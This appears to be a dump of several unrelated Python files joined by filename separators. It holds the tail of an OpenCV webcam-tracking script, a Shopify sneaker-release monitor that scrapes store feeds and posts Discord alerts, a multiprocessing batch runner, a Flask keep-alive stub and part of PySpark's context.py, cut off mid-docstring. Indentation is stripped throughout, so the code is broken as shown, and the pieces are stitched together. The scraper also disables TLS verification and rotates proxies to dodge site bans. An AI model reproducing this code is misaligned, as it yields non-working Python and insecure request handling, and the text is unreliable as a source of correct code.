# #coloris=(255,255,255)
# cv2.circle(frame2,(item[0],item[1]),5,coloris,-1)
if show[0][0]:
cv2.circle(out, (320, 240), 20, (0, 0, 255), -1)
if len(lspoint) >= 30:
lspoint.pop(0)
lspoint.append([show[0][0], show[0][1]])
for item in lspoint:
# coloris=(random.randint(0,255),random.randint(0,255),random.randint(0,255))
coloris = (255, 255, 255)
cv2.circle(out, (item[0], item[1]), 5, coloris, -1)
roll.new_iter([show[0][0]-320+125])
#cv2.putText(frame2, 'love you', (show[0]-70,show[1]), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
fps.display(out)
if isrec:
write(stack, out)
out = cv2.resize(out, (960, 720))
cv2.imshow("raw", out)
# cv2.imshow("1",show[2])
# print(show[0][0],show[0][1])
# print('ok')
k = cv2.waitKey(1) & 0xff
if k == 27:
break
video.release()
# pr.terminate()
cv2.destroyAllWindows()
# Webcam capture test
if __name__ == '__main__':
# profile.run("run()")
runtest()
|
shopify-sites.py
|
'''
NERYS
a universal product monitor
Current Module: Shopify Sites
Usage:
NERYS will monitor specified sites for keywords and sends a Discord alert
when a page has a specified keyword. This can be used to monitor any site
on a product release date to automatically detect when a product has been
uploaded. Useful when monitoring hundreds of sites for shops in different
timezones.
Complete:
- find all products on Shopify site by keyword
- send discord notifications
- monitor for new products
- optimization for Shopify to return product checkout links by size
- find all products on other sites by keyword
- attempt to get product page links for universal sites
Left To Do:
- monitor for Shopify restocks
- monitor for restocks on other sites
-- find sold out by keyword
-- find sizes by keyword
-- find countdown timer by keyword
- detect cloudflare
- get product picture for other sites
- optimization for footsites
Credits:
Niveen Jegatheeswaran - Main Dev - https://github.com/snivyn/
kyb3r - Discord Embed - https://github.com/kyb3r/
'''
import requests
from log import log as log
import time
from threading import Thread
from datetime import datetime
import random
import json
import sqlite3
from bs4 import BeautifulSoup as soup
from discord_hooks import Webhook
from multiprocessing import Process
class FileNotFound(Exception):
''' Raised when a file required for the program to operate is missing. '''
class NoDataLoaded(Exception):
''' Raised when the file is empty. '''
class OutOfProxies(Exception):
''' Raised when there are no proxies left '''
def read_from_txt(path):
'''
(None) -> list of str
Loads up all sites from the sitelist.txt file in the root directory.
Returns the sites as a list
'''
# Initialize variables
raw_lines = []
lines = []
# Load data from the txt file
try:
f = open(path, "r")
raw_lines = f.readlines()
f.close()
# Raise an error if the file couldn't be found
except:
log('e', "Couldn't locate <" + path + ">.")
raise FileNotFound()
if(len(raw_lines) == 0):
raise NoDataLoaded()
# Parse the data
for line in raw_lines:
lines.append(line.strip("\n"))
# Return the data
return lines
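# The loaders below expect plain newline-separated text files; hypothetical
# examples (not shipped with this script) of proxies.txt:
#
#   127.0.0.1:8080
#   user:pass@10.0.0.2:3128
#
# and shopify-sites.txt:
#
#   https://kith.com
#   https://shop.example.com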
def send_embed(alert_type, link, fields, site, image, product):
'''
(str, str, list, str, str, str) -> None
Sends a discord alert based on info provided.
'''
url = webhook
embed = Webhook(url, color=123123)
if(alert_type == "NEW_SHOPIFY"):
desc = "NEW: " + product
elif(alert_type == "RESTOCK_SHOPIFY"):
desc = "RESTOCK: " + product
embed.set_author(name='NERYS', icon='https://static.zerochan.net/Daenerys.Targaryen.full.2190849.jpg')
embed.set_desc(desc)
for field in fields:
if(alert_type == "NEW_SHOPIFY" or alert_type == "RESTOCK_SHOPIFY"):
cart_link = site + "/cart/" + str(field[1]) + ":1"
embed.add_field(name=str(field[0]), value=cart_link)
if(image is not None):
embed.set_thumbnail(image)
embed.set_image(image)
embed.set_footer(text='NERYS by @snivynGOD', icon='https://static.zerochan.net/Daenerys.Targaryen.full.2190849.jpg', ts=True)
embed.post()
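# Note: the checkout links built in send_embed() use Shopify's cart permalink
# format, <site>/cart/<variant_id>:<quantity>, so clicking an alert field adds
# one unit of that variant straight to the cart.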
def get_proxy(proxy_list):
'''
(list) -> dict
Given a proxy list <proxy_list>, a proxy is selected and returned.
'''
# Choose a random proxy
proxy = random.choice(proxy_list)
# Set up the proxy to be used
proxies = {
"http": str(proxy),
"https": str(proxy)
}
# Return the proxy
return proxies
def update_shopify_db(keywords, site, proxy_list):
while(True):
log('i', "Monitoring site <" + site + ">.")
# Create link to monitor (Kith is a special case)
if("kith.com" in site):
link = "https://kith.com/collections/footwear.atom"
else:
link = site + "/collections/all/products.atom"
working = False
# Get a proxy
proxies = get_proxy(proxy_list)
# Get the products on the site
try:
r = requests.get(link, proxies=proxies, timeout=3, verify=False)
except:
try:
proxies = get_proxy(proxy_list)
r = requests.get(link, proxies=proxies, timeout=5, verify=False)
except:
log('e', "Connection to URL <" + link + "> failed.")
continue
xml = soup(r.text, "xml")
products_raw = xml.findAll('entry')
# Get products with the specified keywords
for product in products_raw:
product_found = False
for keyword in keywords:
if(not product_found):
# Get the product info
title = product.find("title").text
link = product.find("link")["href"]
tags_raw = product.findAll("s:tag")
tags = []
for tag in tags_raw:
tags.append(tag.text.upper())
# Check if the keywords are in the product's name or tags
if(keyword.upper() in title.upper() or keyword.upper() in tags):
# Get the variants from the product
try:
r = requests.get(link + ".xml", proxies=proxies, timeout=3, verify=False)
working = True
except:
# Get a new proxy
proxies = get_proxy(proxy_list)
# Try again with a new proxy
try:
r = requests.get(link + ".xml", proxies=proxies, timeout=5, verify=False)
working = True
except:
working = False
# If the site/proxy is working
                        if(working):
# Break down the product page
xml = soup(r.text, "xml")
# Get the variants for the product
variants = []
raw_variants = xml.findAll("variant")
for raw_variant in raw_variants:
variants.append((raw_variant.find("title").text, raw_variant.find("id").text))
# Get the product's image if it's available
try:
image = xml.find("image").find("src").text
except:
image = None
# Store the product in the database
product_info = (title, link, variants, image, title, site)
alert = add_to_shopify_db(product_info)
product_found = True
# Send a Discord alert if the product is new
if(alert):
send_embed("NEW_SHOPIFY", link, variants, site, image, title)
# Wait the specified timeframe before checking the site again
time.sleep(delay)
def add_to_shopify_db(product):
# Initialize variables
title = product[0]
link = product[1]
stock = str(product[2])
alert = False
# Create database
conn = sqlite3.connect('products.db')
c = conn.cursor()
c.execute("""CREATE TABLE IF NOT EXISTS products_shopify(link TEXT UNIQUE, product TEXT, stock TEXT)""")
# Add product to database if it's unique
try:
c.execute("""INSERT INTO products_shopify (link, product, stock) VALUES (?, ?, ?)""", (link, title, stock))
log('s', "Found new product <" + title + ">.")
alert = True
except:
log('i', "Product <" + title + "> already exists in the database.")
# Close database
conn.commit()
c.close()
conn.close()
# Return whether or not it's a new product
return alert
''' --------------------------------- RUN --------------------------------- '''
if(__name__ == "__main__"):
# Ignore insecure messages
requests.packages.urllib3.disable_warnings()
# Initialize settings
keywords = [
"bred toe",
"gold toe",
"pharrell",
"holi",
"free throw line",
"kendrick",
"tinker",
"game royal",
"yeezy",
"human race",
"big bang",
"dont trip",
"don't trip",
"kung fu kenny",
"playstation",
"ovo air jordan",
"ovo jordan",
"wotherspoon",
"nike x off-white",
"off-white x nike",
"air jordan 1",
"wave runner",
"katrina",
"animal pack",
"acronym",
"vf sw",
"the ten",
"the 10"
]
webhook = "" # Put your webhook link here
delay = 5 # Lots of sites + few proxies = longer delay to avoid bans
# Load proxies
proxies = read_from_txt("proxies.txt")
log('i', str(len(proxies)) + " proxies loaded.")
# Store sites from txt files
shopify_sites = read_from_txt("shopify-sites.txt")
total_sites = len(shopify_sites)
log('i', str(total_sites) + " sites loaded.")
# Loop through each Shopify site
for site in shopify_sites:
# Monitor for new products
t = Thread(target=update_shopify_db, args=(keywords, site, proxies))
t.start()
time.sleep(1)
|
logic_batch.py
|
"""Analytic
"""
import multiprocessing as mp
import logic_generator as lg
from tqdm import tqdm
def get_totalCores():
"""Get the total numbers of cores."""
print("Number of Cores:", mp.cpu_count())
def generator_func(items=1):
"""Reference function for multiprocessing.
Parameters
----------
items : int
Number of items in the logic table.
"""
lg.LogicGenerator(items).generator()
def batch_run(n_items):
"""Run a batch of logic generators.
Parameters
----------
    n_items : list
        Item counts for the truth tables; one generator process per entry.
"""
procs = []
    # instantiate one process without any argument (uses the default items=1)
    proc = mp.Process(target=generator_func)
procs.append(proc)
proc.start()
# instantiating process with arguments
for c_item in n_items:
proc = mp.Process(target=generator_func, args=(c_item,))
procs.append(proc)
proc.start()
# complete the processes
for proc in tqdm(procs):
proc.join()
if __name__ == "__main__":
get_totalCores()
batch_run(n_items=[2, 3, 4, 5, 6, 7, 8, 9, 10])
|
keep_alive.py
|
from threading import Thread
from flask import Flask
app = Flask('')
@app.route('/')
def home():
return "I'm keeping alive"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
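# Typical usage (assumed; not shown in this file): import and call keep_alive()
# once at startup so an external uptime pinger can hit the Flask endpoint and
# keep the host awake, e.g.
#
#   from keep_alive import keep_alive
#   keep_alive()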
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway, local_connect_and_auth
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer, ChunkedStream
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
.. note:: :class:`SparkContext` instance is not supported to share across multiple
processes out of the box, and PySpark does not guarantee multi-processing execution.
Use threads instead for concurrent processing purpose.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
if gateway is not None and gateway.gateway_parameters.auth_token is None:
allow_insecure_env = os.environ.get("PYSPARK_ALLOW_INSECURE_GATEWAY", "0")
if allow_insecure_env == "1" or allow_insecure_env.lower() == "true":
warnings.warn(
"You are passing in an insecure Py4j gateway. This "
"presents a security risk, and will be completely forbidden in Spark 3.0")
else:
raise ValueError(
"You are trying to pass an insecure Py4j gateway to Spark. This"
" presents a security risk. If you are sure you understand and accept this"
" risk, you can set the environment variable"
" 'PYSPARK_ALLOW_INSECURE_GATEWAY=1', but"
" note this option will be removed in Spark 3.0")
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
# If encryption is enabled, we need to setup a server in the jvm to read broadcast
# data via a socket.
# scala's mangled names w/ $ in them require special treatment.
self._encryption_enabled = self._jvm.PythonUtils.getEncryptionEnabled(self._jsc)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
        Set a Java system property, such as spark.executor.memory. This must
        be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
def reader_func(temp_filename):
return self._jvm.PythonRDD.readRDDFromFile(self._jsc, temp_filename, numSlices)
def createRDDServer():
return self._jvm.PythonParallelizeServer(self._jsc.sc(), numSlices)
jrdd = self._serialize_to_jvm(c, serializer, reader_func, createRDDServer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, serializer, reader_func, createRDDServer):
"""
Using py4j to send a large dataset to the jvm is really slow, so we use either a file
or a socket if we have encryption enabled.
:param data:
:param serializer:
:param reader_func: A function which takes a filename and reads in the data in the jvm and
returns a JavaRDD. Only used when encryption is disabled.
:param createRDDServer: A function which creates a PythonRDDServer in the jvm to
accept the serialized data, for use when encryption is enabled.
:return:
"""
if self._encryption_enabled:
# with encryption, we open a server in java and send the data directly
server = createRDDServer()
(sock_file, _) = local_connect_and_auth(server.port(), server.secret())
chunked_out = ChunkedStream(sock_file, 8192)
serializer.dump_stream(data, chunked_out)
chunked_out.close()
# this call will block until the server has read all the data and processed it (or
# throws an exception)
r = server.getResult()
return r
else:
# without encryption, we serialize to a file, and we read the file in java and
# parallelize from there.
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
try:
serializer.dump_stream(data, tempFile)
finally:
tempFile.close()
return reader_func(tempFile.name)
finally:
                # we eagerly read the file so we can delete it right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred; large files are also allowed, but
may cause poor performance.
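Illustrative example (hypothetical path; each value is the file's raw bytes)::
rdd = sc.binaryFiles("hdfs://a-hdfs-path/images")
sizes = rdd.mapValues(len).collect()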
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
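Illustrative example (hypothetical path; assumes each record is two
little-endian 32-bit integers, so recordLength is 8 bytes)::
import struct
rdd = sc.binaryRecords("hdfs://a-hdfs-path/records.bin", recordLength=8)
pairs = rdd.map(lambda record: struct.unpack("<ii", record))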
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
:param path: path to sequencefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
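Illustrative example (hypothetical path)::
rdd = sc.sequenceFile("hdfs://a-hdfs-path/seq",
keyClass="org.apache.hadoop.io.Text",
valueClass="org.apache.hadoop.io.LongWritable")
rdd.first()  # e.g. (u'some-key', 42)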
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
